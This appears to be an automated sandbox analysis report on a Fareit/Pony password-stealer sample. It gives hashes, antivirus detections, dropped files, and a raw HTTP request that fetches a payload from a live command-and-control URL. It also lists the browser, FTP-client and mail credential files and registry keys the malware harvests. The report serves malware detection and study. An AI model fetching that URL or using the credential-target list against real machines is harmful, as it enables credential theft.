- * MalFamily: "Fareit"
- * MalScore: 10.0
- * File Name: "Exes_600290989d7810da164abc50b9996801.exe"
- * File Size: 92672
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "2932fc5a8f05d1a863283c5329d139e447c556a2117c471af92c0232a12275f2"
- * MD5: "600290989d7810da164abc50b9996801"
- * SHA1: "d0cac69604098796ea3589d81a5e2b616e094f76"
- * SHA512: "218067e61f55f18c677c6737b655b7a1b737781253463360833b7c53da437cb3a4e680292a8ecbb222938d56a39100ffe3d9a20e8747c5b54ba027b2f33dcea6"
- * CRC32: "56E6BC64"
- * SSDEEP: "1536:fICsMEtHqTXM/r3cmN77FZctfKigljzyxb4ONKZ5TvoEA7kzmKx:ACs/hr3cmR7FZcNAVrONEADKx"
- * Process Execution:
- "EhKeCN2DDdNim.exe",
- "6933296.exe",
- "cmd.exe",
- "cmd.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe ",
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat\" \"C:\\Users\\user\\AppData\\Local\\Temp\\EhKeCN2DDdNim.exe\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat \"C:\\Users\\user\\AppData\\Local\\Temp\\EhKeCN2DDdNim.exe\"",
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat\" \"C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat \"C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe\""
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "EhKeCN2DDdNim.exe, PID 424"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "EhKeCN2DDdNim.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat"
- "Process": "6933296.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "http_version_old": "HTTP traffic uses version 1.0"
- "suspicious_request": "http://iosappdevelopmentindia.com/server/oscar.exe"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://iosappdevelopmentindia.com/server/oscar.exe"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat \"C:\\Users\\user\\AppData\\Local\\Temp\\EhKeCN2DDdNim.exe\""
- "command": "C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat \"C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe\""
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "Description": "Exhibits behavior characteristic of Pony malware",
- "Details":
- "C2": "http://iosappdevelopmentindia.com/server/oscar.exe"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "CAPE detected the Fareit malware family",
- "Details":
- "Description": "File has been identified by 56 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Generic.StealerA.BE30A4FF"
- "CAT-QuickHeal": "Trojanpws.Tepfer.20303"
- "McAfee": "PWS-Zbot.gen.ate"
- "Cylance": "Unsafe"
- "CrowdStrike": "win/malicious_confidence_100% (W)"
- "BitDefender": "Generic.StealerA.BE30A4FF"
- "K7GW": "Password-Stealer ( 0040f4f51 )"
- "K7AntiVirus": "Password-Stealer ( 0040f4f51 )"
- "Arcabit": "Generic.StealerA.BE30A4FF"
- "Baidu": "Win32.Trojan-PSW.Fareit.a"
- "F-Prot": "W32/Bloop.A.gen!Eldorado"
- "Symantec": "Infostealer!im"
- "ESET-NOD32": "a variant of Win32/PSW.Fareit.A"
- "APEX": "Malicious"
- "Avast": "Sf:Crypt-AS Trj"
- "ClamAV": "Win.Trojan.Fareit-403"
- "GData": "Win32.Trojan-Stealer.Zbot.AB"
- "Kaspersky": "Trojan-PSW.Win32.Tepfer.gen"
- "Alibaba": "TrojanPSW:Win32/Tepfer.d5f49d23"
- "NANO-Antivirus": "Trojan.Win32.Siggen.evgeyh"
- "Paloalto": "generic.ml"
- "AegisLab": "Trojan.Win32.Generic.mtwx"
- "Ad-Aware": "Generic.StealerA.BE30A4FF"
- "Sophos": "Mal/Pony-A"
- "Comodo": "TrojWare.Win32.PWS.Fareit.GS@5t8zib"
- "F-Secure": "Trojan.TR/PSW.Fareit.iloen"
- "DrWeb": "Trojan.PWS.Stealer.1932"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.PWSZbot.nh"
- "Trapmine": "malicious.high.ml.score"
- "FireEye": "Generic.mg.600290989d7810da"
- "Emsisoft": "Generic.StealerA.BE30A4FF (B)"
- "SentinelOne": "DFI - Malicious PE"
- "Cyren": "W32/Bloop.A.gen!Eldorado"
- "Jiangmin": "Trojan/PSW.Tepfer.btny"
- "eGambit": "Unsafe.AI_Score_99%"
- "Avira": "TR/PSW.Fareit.iloen"
- "Antiy-AVL": "TrojanPSW/Win32.Tepfer"
- "Microsoft": "PWS:Win32/Fareit"
- "Endgame": "malicious (high confidence)"
- "ZoneAlarm": "Trojan-PSW.Win32.Tepfer.gen"
- "AhnLab-V3": "Trojan/Win32.Tepfer.R93111"
- "Acronis": "suspicious"
- "VBA32": "SScope.Malware-Cryptor.Ponik"
- "ALYac": "Generic.StealerA.BE30A4FF"
- "MAX": "malware (ai score=100)"
- "Malwarebytes": "Spyware.Pony"
- "TrendMicro-HouseCall": "BKDR_PONY.SM"
- "Rising": "Stealer.Fareit!1.B777 (CLASSIC)"
- "Yandex": "Trojan.PonyPass.Gen.LH"
- "Ikarus": "Trojan-Spy.Fareit"
- "Fortinet": "W32/Agent.NTM!tr"
- "AVG": "Sf:Crypt-AS Trj"
- "Cybereason": "malicious.89d781"
- "Panda": "Trj/Genetic.gen"
- "Qihoo-360": "Win32/Trojan.PSW.c13"
- "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
- "Details":
- "target": "clamav:Win.Trojan.Fareit-403, sha256:2932fc5a8f05d1a863283c5329d139e447c556a2117c471af92c0232a12275f2, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "dropped": "clamav:Win.Trojan.Fareit-403, sha256:e656a87f9ee91482ad7ff860d2c5898b1b4a2405af7d5b6026952a387c29813e , guest_paths:C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Program Files (x86)\\CuteFTP\\sm.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\CuteFTP\\sm.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP\\sm.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CuteFTP\\sm.dat"
- "file": "C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP\\sm.dat"
- "file": "C:\\ProgramData\\CuteFTP\\sm.dat"
- "file": "C:\\ProgramData\\GlobalSCAPE\\CuteFTP\\sm.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\GlobalSCAPE\\CuteFTP\\sm.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\4\\Sites.dat"
- "file": "C:\\ProgramData\\FlashFXP\\3\\Sites.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\3\\Sites.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\4\\Sites.dat"
- "file": "C:\\ProgramData\\FlashFXP\\4\\Sites.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\3\\Sites.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\3\\Quick.dat"
- "file": "C:\\ProgramData\\FlashFXP\\4\\Quick.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\4\\Quick.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\4\\Quick.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\3\\Quick.dat"
- "file": "C:\\ProgramData\\FlashFXP\\3\\Quick.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\FileZilla\\sitemanager.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
- "file": "C:\\ProgramData\\FileZilla\\sitemanager.xml"
- "file": "C:\\ProgramData\\FileZilla\\recentservers.xml"
- "file": "C:\\Users\\user\\AppData\\Local\\FileZilla\\recentservers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "file": "C:\\Users\\user\\AppData\\Local\\VanDyke\\Config\\Sessions\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\VanDyke\\Config\\Sessions\\*.*"
- "file": "C:\\ProgramData\\VanDyke\\Config\\Sessions\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FTP Explorer\\*.*"
- "file": "C:\\Users\\user\\AppData\\Local\\FTP Explorer\\*.*"
- "file": "C:\\ProgramData\\FTP Explorer\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\*.*"
- "file": "C:\\Users\\user\\AppData\\Local\\SmartFTP\\*.*"
- "file": "C:\\ProgramData\\SmartFTP\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\TurboFTP\\*.*"
- "file": "C:\\Users\\user\\AppData\\Local\\TurboFTP\\*.*"
- "file": "C:\\ProgramData\\TurboFTP\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FTPRush\\*.*"
- "file": "C:\\Users\\user\\AppData\\Local\\FTPRush\\*.*"
- "file": "C:\\ProgramData\\FTPRush\\*.*"
- "file": "C:\\ProgramData\\LeapWare\\LeapFTP\\*.*"
- "file": "C:\\Users\\user\\AppData\\Local\\LeapWare\\LeapFTP\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\LeapWare\\LeapFTP\\*.*"
- "file": "C:\\Users\\user\\AppData\\Local\\FTPGetter\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\*.*"
- "file": "C:\\ProgramData\\FTPGetter\\*.*"
- "file": "C:\\Users\\user\\AppData\\Local\\Estsoft\\ALFTP\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\*.*"
- "file": "C:\\ProgramData\\Estsoft\\ALFTP\\*.*"
- "file": "C:\\Program Files (x86)\\Common Files\\Ipswitch\\WS_FTP\\*.*"
- "key": "HKEY_CURRENT_USER\\Software\\Far Manager\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Far\\SavedDialogHistory\\FTPHost"
- "key": "HKEY_CURRENT_USER\\Software\\Far2\\SavedDialogHistory\\FTPHost"
- "key": "HKEY_CURRENT_USER\\Software\\Far Manager\\SavedDialogHistory\\FTPHost"
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"
- "key": "HKEY_LOCAL_MACHINE\\Software\\Ghisler\\Windows Commander"
- "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Windows Commander"
- "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
- "key": "HKEY_LOCAL_MACHINE\\Software\\Ghisler\\Total Commander"
- "key": "HKEY_CURRENT_USER\\Software\\BPFTP\\Bullet Proof FTP\\Options"
- "key": "HKEY_CURRENT_USER\\Software\\BPFTP\\Bullet Proof FTP\\Main"
- "key": "HKEY_CURRENT_USER\\Software\\FileZilla"
- "key": "HKEY_LOCAL_MACHINE\\Software\\FileZilla"
- "key": "HKEY_CURRENT_USER\\Software\\FileZilla Client"
- "key": "HKEY_LOCAL_MACHINE\\Software\\FileZilla Client"
- "key": "HKEY_CURRENT_USER\\Software\\TurboFTP"
- "key": "HKEY_LOCAL_MACHINE\\Software\\TurboFTP"
- "key": "HKEY_CURRENT_USER\\Software\\Sota\\FFFTP\\Options"
- "key": "HKEY_CURRENT_USER\\Software\\Sota\\FFFTP"
- "key": "HKEY_CURRENT_USER\\Software\\FTPWare\\COREFTP\\Sites"
- "key": "HKEY_CURRENT_USER\\Software\\FTP Explorer\\FTP Explorer\\Workspace\\MFCToolBar-224"
- "key": "HKEY_CURRENT_USER\\Software\\FTP Explorer\\Profiles"
- "key": "HKEY_LOCAL_MACHINE\\Software\\FTPClient\\Sites"
- "key": "HKEY_CURRENT_USER\\Software\\FTPClient\\Sites"
- "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Robo-FTP 3.7\\Scripts"
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Robo-FTP 3.7\\FTPServers"
- "key": "HKEY_CURRENT_USER\\SOFTWARE\\Robo-FTP 3.7\\FTPServers"
- "key": "HKEY_CURRENT_USER\\SOFTWARE\\Robo-FTP 3.7\\Scripts"
- "key": "HKEY_CURRENT_USER\\Software\\MAS-Soft\\FTPInfo\\Setup"
- "key": "HKEY_LOCAL_MACHINE\\Software\\SoftX.org\\FTPClient\\Sites"
- "key": "HKEY_CURRENT_USER\\Software\\SoftX.org\\FTPClient\\Sites"
- "key": "HKEY_CURRENT_USER\\Software\\BulletProof Software\\BulletProof FTP Client\\Main"
- "key": "HKEY_CURRENT_USER\\Software\\BulletProof Software\\BulletProof FTP Client\\Options"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts"
- "key": "HKEY_CURRENT_USER\\Identities\\0A258175-2D14-4D69-9955-E200F247250F\\Software\\Microsoft\\Internet Account Manager\\Accounts"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Fareit/Pony Downloader Checkin 3"
- "signature": "ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98"
- "signature": "ET TROJAN Pony DLL Download M2"
- * Started Service:
- * Mutexes:
- "Local\\_!MSFTHISTORY!_",
- "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
- "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
- "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe",
- "\\??\\PIPE\\samr",
- "C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\EhKeCN2DDdNim.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\6936765.bat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\6933296.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\6944828.bat"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\WinRAR",
- "HKEY_CURRENT_USER\\Software\\WinRAR\\HWID",
- "HKEY_CURRENT_USER\\Software\\WinRAR\\649235066887F12B1074B4DDCD305C91"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "iosappdevelopmentindia.com",
- "answers":
- "data": "192.185.117.254",
- "type": "A"
- "type": "A",
- "request": "nztnyavroi.ru.net",
- "answers":
- * Domains:
- "ip": "",
- "domain": "nztnyavroi.ru.net"
- "ip": "192.185.117.254",
- "domain": "iosappdevelopmentindia.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://iosappdevelopmentindia.com/server/oscar.exe",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)",
- "method": "GET",
- "host": "iosappdevelopmentindia.com",
- "version": "1.0",
- "path": "/server/oscar.exe",
- "data": "GET /server/oscar.exe HTTP/1.0\r\nHost: iosappdevelopmentindia.com\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nConnection: close\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "United States",
- "ip": "192.185.117.254",
- "inaddrarpa": "",
- "hostname": "iosappdevelopmentindia.com"
- * Network Communication - IRC: